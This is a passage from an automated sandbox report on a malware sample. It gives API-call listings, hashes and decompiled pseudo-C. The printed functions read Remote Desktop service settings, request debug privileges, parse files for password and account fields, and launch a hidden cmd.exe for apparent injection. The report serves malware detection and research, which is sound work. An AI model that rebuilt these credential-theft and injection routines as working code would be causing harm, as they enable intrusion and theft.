                                                                      • Part of subcall function 02D1D9B6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 02D1D9EA
                                                                    • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 02D1E17F
                                                                    • LeaveCriticalSection.KERNEL32(?,00000000), ref: 02D1E2CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 1717069549-2896544425
                                                                    • Opcode ID: 21186043ae3416532f29f85326fcdceed3b431af0477c3acbddcbc763b1cb4ee
                                                                    • Instruction ID: 2054353430e045d7c8ae5bffad5263c30a1c8f216dd0b1024dbfd90e5edcc382
                                                                    • Opcode Fuzzy Hash: 21186043ae3416532f29f85326fcdceed3b431af0477c3acbddcbc763b1cb4ee
                                                                    • Instruction Fuzzy Hash: 7EB11F71508355BBC718EB60EC90DAEB7AAFF54344F40092DF55293A90EB64ED09CF62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1DCB2(void* __ecx, void* __edx) {
                                                                    				void* _v8;
                                                                    				WCHAR* _v12;
                                                                    				signed int _v16;
                                                                    				short* _v20;
                                                                    				short* _v24;
                                                                    				char _v28;
                                                                    				int _v32;
                                                                    				char _v36;
                                                                    				void* _t50;
                                                                    				void* _t62;
                                                                    				void* _t72;
                                                                    				void* _t96;
                                                                    
                                                                    				_t96 = __edx;
                                                                    				_t72 = __ecx;
                                                                    				_v8 = 0;
                                                                    				E02D135E5( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
                                                                    				E02D135E5( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
                                                                    				_v36 = 0;
                                                                    				_v32 = 0;
                                                                    				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
                                                                    					_t50 = E02D20FC3(_t96, E02D135E5( &_v16, L"ImagePath"),  &_v36);
                                                                    					E02D15EA5(_v16);
                                                                    					E02D20FAE( &_v8);
                                                                    					if(_t50 != 0) {
                                                                    						E02D12ECF( &_v36,  &_v12);
                                                                    						E02D12FC3( &_v36);
                                                                    						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
                                                                    							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
                                                                    								_t62 = E02D20FC3(_t96, E02D135E5( &_v16, L"ServiceDll"),  &_v36);
                                                                    								E02D15EA5(_v16);
                                                                    								_t107 = _t62;
                                                                    								if(_t62 != 0) {
                                                                    									E02D13437(_t72 + 0x20, E02D131D4( &_v16, E02D12ECF( &_v36,  &_v28), _t107));
                                                                    									E02D15EA5(_v16);
                                                                    									_v16 = _v16 & 0x00000000;
                                                                    									E02D15EA5(_v28);
                                                                    								}
                                                                    								E02D20FAE( &_v8);
                                                                    							}
                                                                    						}
                                                                    						E02D15EA5(_v12);
                                                                    						_v12 = _v12 & 0x00000000;
                                                                    					}
                                                                    				}
                                                                    				E02D13036( &_v36);
                                                                    				E02D15EA5(_v20);
                                                                    				E02D15EA5(_v24);
                                                                    				return E02D20FAE( &_v8);
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 02D1DCF3
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,00000000,02D235AB,?,?,?,02D215B2,?,?,80000001), ref: 02D20FE6
                                                                      • Part of subcall function 02D20FC3: RegQueryValueExW.ADVAPI32(?,745D0770,00000000,745D0770,00000000,00000000,?,02D215B2,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 02D2100A
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D20FAE: RegCloseKey.KERNEL32(?,?,02D2112D,?,?,02D236DB), ref: 02D20FB8
                                                                    • StrStrW.SHLWAPI(?,svchost.exe,?,00000000,ImagePath,?), ref: 02D1DD57
                                                                    • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 02D1DD65
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 02D1DD82
                                                                    Strings
                                                                    • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 02D1DCCE
                                                                    • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 02D1DCBE
                                                                    • ServiceDll, xrefs: 02D1DD90
                                                                    • svchost.exe -k, xrefs: 02D1DD5D
                                                                    • ImagePath, xrefs: 02D1DD05
                                                                    • svchost.exe, xrefs: 02D1DD4F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                                                    • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                                                    • API String ID: 2246401353-3333427388
                                                                    • Opcode ID: acd25fc8a8e6b147716e62dbd37e7e29ddac49fe5d1828a56835e5cde547d75c
                                                                    • Instruction ID: b9ed19d49a654b96b8da8925e4aefeaf4d99474c208cfe44d3dd70ad1006d916
                                                                    • Opcode Fuzzy Hash: acd25fc8a8e6b147716e62dbd37e7e29ddac49fe5d1828a56835e5cde547d75c
                                                                    • Instruction Fuzzy Hash: 0C41EC71D40228BBEF14EBA0ED95EEEB77AEF64744F500165D90172690EB359E08CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,745D21E0,00000000,?,00405379,?), ref: 0040415A
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 0040416A
                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00404192
                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,745D21E0,00000000,?,00405379,?), ref: 004041B7
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 004041C7
                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00404209
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AddressDeleteHandleModuleProc
                                                                    • String ID: Advapi32.dll$RegDeleteKeyExA$RegDeleteKeyTransactedA
                                                                    • API String ID: 588496660-4191909587
                                                                    • Opcode ID: cdbaf511d23021004905ddd44b9eb96a329afd81a02c84bcac3e81cc22828284
                                                                    • Instruction ID: 31cb0f562f2addb13c78b9d3578784c73011449209a938ffb56c889bd236f6ef
                                                                    • Opcode Fuzzy Hash: cdbaf511d23021004905ddd44b9eb96a329afd81a02c84bcac3e81cc22828284
                                                                    • Instruction Fuzzy Hash: 5721077A340304BFE7205BA9EC08BD67B54EBB5351F14403BF608E91E0DB799494DB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 0040D998
                                                                      • Part of subcall function 0040DD40: HeapFree.KERNEL32(00000000,00000000,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?), ref: 0040DD56
                                                                      • Part of subcall function 0040DD40: GetLastError.KERNEL32(?,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?,?), ref: 0040DD68
                                                                    • _free.LIBCMT ref: 0040D9A4
                                                                    • _free.LIBCMT ref: 0040D9AF
                                                                    • _free.LIBCMT ref: 0040D9BA
                                                                    • _free.LIBCMT ref: 0040D9C5
                                                                    • _free.LIBCMT ref: 0040D9D0
                                                                    • _free.LIBCMT ref: 0040D9DB
                                                                    • _free.LIBCMT ref: 0040D9E6
                                                                    • _free.LIBCMT ref: 0040D9F1
                                                                    • _free.LIBCMT ref: 0040D9FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 322fca033e056e5ddd0bd499672412c1b1e73136b32eb58e03349ce2567b41c9
                                                                    • Instruction ID: 212a4a0f6f2174d3900e3400fc6909053a36871c0fe51127085b706aebf44512
                                                                    • Opcode Fuzzy Hash: 322fca033e056e5ddd0bd499672412c1b1e73136b32eb58e03349ce2567b41c9
                                                                    • Instruction Fuzzy Hash: 0B219876900108AFCB41EFD5C881DEE7BB9FF48344F0041AAF619AF161DB35EA588B84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 97%
                                                                    			E02D19ADF(intOrPtr __ecx, CHAR* _a4) {
                                                                    				char _v12;
                                                                    				long _v16;
                                                                    				void* _v20;
                                                                    				long _v24;
                                                                    				intOrPtr _v28;
                                                                    				void* _v32;
                                                                    				intOrPtr _v36;
                                                                    				intOrPtr _v40;
                                                                    				char _v44;
                                                                    				char _v48;
                                                                    				char _v52;
                                                                    				char _t96;
                                                                    				void* _t102;
                                                                    				char _t104;
                                                                    				void* _t125;
                                                                    				intOrPtr _t127;
                                                                    				char _t128;
                                                                    				long _t133;
                                                                    				void* _t135;
                                                                    				intOrPtr _t136;
                                                                    				void* _t141;
                                                                    				void* _t146;
                                                                    				void* _t147;
                                                                    				intOrPtr* _t165;
                                                                    				intOrPtr* _t167;
                                                                    				void* _t168;
                                                                    				void* _t169;
                                                                    				void* _t170;
                                                                    				void* _t172;
                                                                    				intOrPtr* _t173;
                                                                    				void* _t174;
                                                                    				intOrPtr _t175;
                                                                    				intOrPtr* _t177;
                                                                    				CHAR* _t178;
                                                                    				void* _t179;
                                                                    				void* _t180;
                                                                    
                                                                    				_v36 = __ecx;
                                                                    				_t174 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
                                                                    				if(_t174 != 0xffffffff) {
                                                                    					_t133 = GetFileSize(_t174, 0);
                                                                    					_v16 = _t133;
                                                                    					_t172 = E02D11085(_t133);
                                                                    					_v32 = _t172;
                                                                    					E02D11052(_t172, 0, _t133);
                                                                    					_v24 = _v24 & 0x00000000;
                                                                    					_t180 = _t179 + 0x10;
                                                                    					ReadFile(_t174, _t172, _t133,  &_v24, 0);
                                                                    					CloseHandle(_t174);
                                                                    					_t175 = E02D15EB4(0x400000);
                                                                    					_v28 = _t175;
                                                                    					_a4 = E02D15EB4(0x104);
                                                                    					_t96 = E02D15EB4(0x104);
                                                                    					_t141 = 0;
                                                                    					_v12 = _t96;
                                                                    					_t135 = 0;
                                                                    					__eflags = _v16;
                                                                    					if(_v16 <= 0) {
                                                                    						L36:
                                                                    						E02D15EA5(_a4);
                                                                    						E02D15EA5(_v12);
                                                                    						E02D15EA5(_t175);
                                                                    						return E02D11099(_t172);
                                                                    					} else {
                                                                    						goto L3;
                                                                    					}
                                                                    					do {
                                                                    						L3:
                                                                    						_t167 =  *((intOrPtr*)(_t135 + _t172));
                                                                    						_t13 = _t167 - 0x21; // -33
                                                                    						__eflags = _t13 - 0x5d;
                                                                    						if(_t13 > 0x5d) {
                                                                    							goto L28;
                                                                    						}
                                                                    						__eflags = _t167 - 0x3d;
                                                                    						if(_t167 == 0x3d) {
                                                                    							goto L28;
                                                                    						}
                                                                    						 *((char*)(_t141 + _t175)) = _t167;
                                                                    						_t141 = _t141 + 1;
                                                                    						__eflags = _t167;
                                                                    						if(_t167 != 0) {
                                                                    							__eflags =  *((char*)(_t141 + _t175 - 8)) - 0x50;
                                                                    							if( *((char*)(_t141 + _t175 - 8)) != 0x50) {
                                                                    								goto L28;
                                                                    							}
                                                                    							__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x61;
                                                                    							if( *((char*)(_t141 + _t175 - 7)) != 0x61) {
                                                                    								goto L28;
                                                                    							}
                                                                    							__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x73;
                                                                    							if( *((char*)(_t141 + _t175 - 6)) != 0x73) {
                                                                    								goto L28;
                                                                    							}
                                                                    							__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x73;
                                                                    							if( *((char*)(_t141 + _t175 - 5)) != 0x73) {
                                                                    								goto L28;
                                                                    							}
                                                                    							__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x77;
                                                                    							if( *((char*)(_t141 + _t175 - 4)) != 0x77) {
                                                                    								goto L28;
                                                                    							}
                                                                    							__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x6f;
                                                                    							if( *((char*)(_t141 + _t175 - 3)) != 0x6f) {
                                                                    								goto L28;
                                                                    							}
                                                                    							__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x72;
                                                                    							if( *((char*)(_t141 + _t175 - 2)) != 0x72) {
                                                                    								goto L28;
                                                                    							}
                                                                    							__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x64;
                                                                    							if( *((char*)(_t141 + _t175 - 1)) == 0x64) {
                                                                    								__eflags =  *_t172 - 0xd0;
                                                                    								_t102 = 2;
                                                                    								_t146 = 9;
                                                                    								_t103 =  !=  ? _t146 : _t102;
                                                                    								_t168 = 0;
                                                                    								_t147 = ( !=  ? _t146 : _t102) + _t135;
                                                                    								_t104 =  *((intOrPtr*)(_t147 + _t172));
                                                                    								__eflags = _t104 - 0x20;
                                                                    								if(_t104 <= 0x20) {
                                                                    									L35:
                                                                    									_t60 =  &_v12; // 0x50
                                                                    									__eflags = 0;
                                                                    									_v52 = 0;
                                                                    									_v48 = 0;
                                                                    									_v44 = 0;
                                                                    									 *((char*)(_t168 +  *_t60)) = 0;
                                                                    									E02D133BF( &_v20,  *_t60);
                                                                    									_t66 =  &_a4; // 0x50
                                                                    									E02D133BF( &_v16,  *_t66);
                                                                    									E02D13437( &_v44, E02D1309D( &_v20, __eflags,  &_v32));
                                                                    									E02D15EA5(_v32);
                                                                    									E02D13437( &_v48, E02D1309D( &_v16, __eflags,  &_v32));
                                                                    									E02D15EA5(_v32);
                                                                    									_v40 = 5;
                                                                    									E02D13437( &_v52, E02D135E5( &_v32, 0x2d24648));
                                                                    									E02D15EA5(_v32);
                                                                    									E02D11F95(_t180 - 0x10,  &_v52);
                                                                    									E02D11FCB(_v36);
                                                                    									E02D15EA5(_v16);
                                                                    									E02D15EA5(_v20);
                                                                    									E02D113EF( &_v52);
                                                                    									goto L36;
                                                                    								}
                                                                    								_t58 =  &_v12; // 0x50
                                                                    								_t136 =  *_t58;
                                                                    								_t165 = _t147 + _t172;
                                                                    								__eflags = _t165;
                                                                    								while(1) {
                                                                    									__eflags = _t104 - 0x7f;
                                                                    									if(_t104 >= 0x7f) {
                                                                    										goto L35;
                                                                    									}
                                                                    									__eflags = _t104 - 0x21;
                                                                    									if(_t104 == 0x21) {
                                                                    										goto L35;
                                                                    									}
                                                                    									 *((char*)(_t168 + _t136)) = _t104;
                                                                    									_t168 = _t168 + 1;
                                                                    									_t165 = _t165 + 1;
                                                                    									_t104 =  *_t165;
                                                                    									__eflags = _t104 - 0x20;
                                                                    									if(_t104 > 0x20) {
                                                                    										continue;
                                                                    									}
                                                                    									goto L35;
                                                                    								}
                                                                    								goto L35;
                                                                    							}
                                                                    							goto L28;
                                                                    						}
                                                                    						__eflags = _t141 - 7;
                                                                    						if(_t141 <= 7) {
                                                                    							goto L28;
                                                                    						}
                                                                    						__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x41;
                                                                    						if( *((char*)(_t141 + _t175 - 7)) != 0x41) {
                                                                    							goto L28;
                                                                    						}
                                                                    						__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x63;
                                                                    						if( *((char*)(_t141 + _t175 - 6)) != 0x63) {
                                                                    							goto L28;
                                                                    						}
                                                                    						__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x63;
                                                                    						if( *((char*)(_t141 + _t175 - 5)) != 0x63) {
                                                                    							goto L28;
                                                                    						}
                                                                    						__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x6f;
                                                                    						if( *((char*)(_t141 + _t175 - 4)) != 0x6f) {
                                                                    							goto L28;
                                                                    						}
                                                                    						__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x75;
                                                                    						if( *((char*)(_t141 + _t175 - 3)) != 0x75) {
                                                                    							goto L28;
                                                                    						}
                                                                    						__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x6e;
                                                                    						if( *((char*)(_t141 + _t175 - 2)) != 0x6e) {
                                                                    							goto L28;
                                                                    						}
                                                                    						__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x74;
                                                                    						if( *((char*)(_t141 + _t175 - 1)) != 0x74) {
                                                                    							goto L28;
                                                                    						}
                                                                    						__eflags =  *_t172 - 0xd0;
                                                                    						_t125 = 2;
                                                                    						_t169 = 9;
                                                                    						_t126 =  !=  ? _t169 : _t125;
                                                                    						_t170 = 0;
                                                                    						_t127 = ( !=  ? _t169 : _t125) + _t135;
                                                                    						_v20 = _t127;
                                                                    						_t128 =  *((intOrPtr*)(_t127 + _t172));
                                                                    						__eflags = _t128 - 0x20;
                                                                    						if(_t128 <= 0x20) {
                                                                    							L19:
                                                                    							 *((char*)(_t170 + _a4)) = 0;
                                                                    							goto L28;
                                                                    						}
                                                                    						_t177 = _v20 + _t172;
                                                                    						__eflags = _t177;
                                                                    						_v20 = _t177;
                                                                    						_t173 = _t177;
                                                                    						_t178 = _a4;
                                                                    						while(1) {
                                                                    							__eflags = _t128 - 0x7f;
                                                                    							if(_t128 >= 0x7f) {
                                                                    								break;
                                                                    							}
                                                                    							_t173 = _t173 + 1;
                                                                    							 *((char*)(_t170 + _t178)) = _t128;
                                                                    							_t170 = _t170 + 1;
                                                                    							_t128 =  *_t173;
                                                                    							__eflags = _t128 - 0x20;
                                                                    							if(_t128 > 0x20) {
                                                                    								continue;
                                                                    							}
                                                                    							break;
                                                                    						}
                                                                    						_t175 = _v28;
                                                                    						_t172 = _v32;
                                                                    						goto L19;
                                                                    						L28:
                                                                    						_t135 = _t135 + 1;
                                                                    						__eflags = _t135 - _v16;
                                                                    					} while (_t135 < _v16);
                                                                    					goto L36;
                                                                    				}
                                                                    				GetLastError();
                                                                    				return CloseHandle(_t174);
                                                                    			}

                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 02D19AFC
                                                                    • GetLastError.KERNEL32 ref: 02D19B09
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D19B10
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 02D19B1D
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D19B4C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D19B53
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseHandle$CreateErrorLastReadSize
                                                                    • String ID: Password$Password
                                                                    • API String ID: 1366138817-7788977
                                                                    • Opcode ID: 861dd51d597c72b2478fe4b90d0ddf3cb73a3c183496c77463936f5ad0401a86
                                                                    • Instruction ID: 5810d38cabab6866bd42013b5a7df645dd9ca3b67c12d343b173a6f9b70a5f8c
                                                                    • Opcode Fuzzy Hash: 861dd51d597c72b2478fe4b90d0ddf3cb73a3c183496c77463936f5ad0401a86
                                                                    • Instruction Fuzzy Hash: 948104B0D04148BEEF25DBA8F8A0BEDBFA6AF81304F50406ED48167B81CB755D46CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02D1F825
                                                                    • CoInitialize.OLE32(00000000), ref: 02D1F82C
                                                                    • CoCreateInstance.OLE32(02D24490,00000000,00000017,02D26E60,?,?,?,?,?,?,?,?,?,02D12D0C), ref: 02D1F84A
                                                                    • VariantInit.OLEAUT32(?), ref: 02D1F8CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Initialize$CreateInitInstanceSecurityVariant
                                                                    • String ID: Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                                                    • API String ID: 2382742315-3227336550
                                                                    • Opcode ID: 85118ceba9c344d6a05d32e17847d768b58d9826648e28f43bc882b7cac3979f
                                                                    • Instruction ID: 24793e60457a2f9279c74cc21a2a7c55e5128b4f65139b3cb26f9f4249422f88
                                                                    • Opcode Fuzzy Hash: 85118ceba9c344d6a05d32e17847d768b58d9826648e28f43bc882b7cac3979f
                                                                    • Instruction Fuzzy Hash: 88411670A00249BFDB14DB95DC48EAFBBBDEFC9B18B104498F516EB650D670AD09CB20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 68%
                                                                    			E02D21F13() {
                                                                    				void* _v8;
                                                                    				struct _PROCESS_INFORMATION _v24;
                                                                    				struct _STARTUPINFOA _v100;
                                                                    				int _t10;
                                                                    				void* _t23;
                                                                    				int _t24;
                                                                    				CHAR* _t26;
                                                                    
                                                                    				_v8 = 0;
                                                                    				_t10 = GetCurrentProcess();
                                                                    				__imp__IsWow64Process(_t10,  &_v8);
                                                                    				if(_t10 != 0) {
                                                                    					if(_v8 == 0) {
                                                                    						_t10 = E02D220B8(_t23, __eflags);
                                                                    						__eflags = _t10;
                                                                    						if(_t10 != 0) {
                                                                    							_t24 = _t10;
                                                                    							goto L6;
                                                                    						}
                                                                    					} else {
                                                                    						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
                                                                    						GetWindowsDirectoryA(_t26, 0x104);
                                                                    						E02D1102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
                                                                    						E02D11052( &_v100, 0, 0x44);
                                                                    						asm("stosd");
                                                                    						asm("stosd");
                                                                    						asm("stosd");
                                                                    						asm("stosd");
                                                                    						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
                                                                    						if(_t10 != 0) {
                                                                    							Sleep(0x3e8);
                                                                    							_t24 = _v24.dwProcessId;
                                                                    							L6:
                                                                    							return E02D21FD8(_t24);
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t10;
                                                                    			}

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,745D0770,00000000), ref: 02D21F25
                                                                    • IsWow64Process.KERNEL32(00000000), ref: 02D21F2C
                                                                    • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 02D21F50
                                                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 02D21F5E
                                                                    • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 02D21F6C
                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02D21FA9
                                                                    • Sleep.KERNEL32(000003E8), ref: 02D21FB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                                                    • String ID: \System32\cmd.exe
                                                                    • API String ID: 3151064845-2003734499
                                                                    • Opcode ID: e30f0d67b10b0f3ea7bcf7bd073f69aa4adbcdde7dc5bfe1220792854650b540
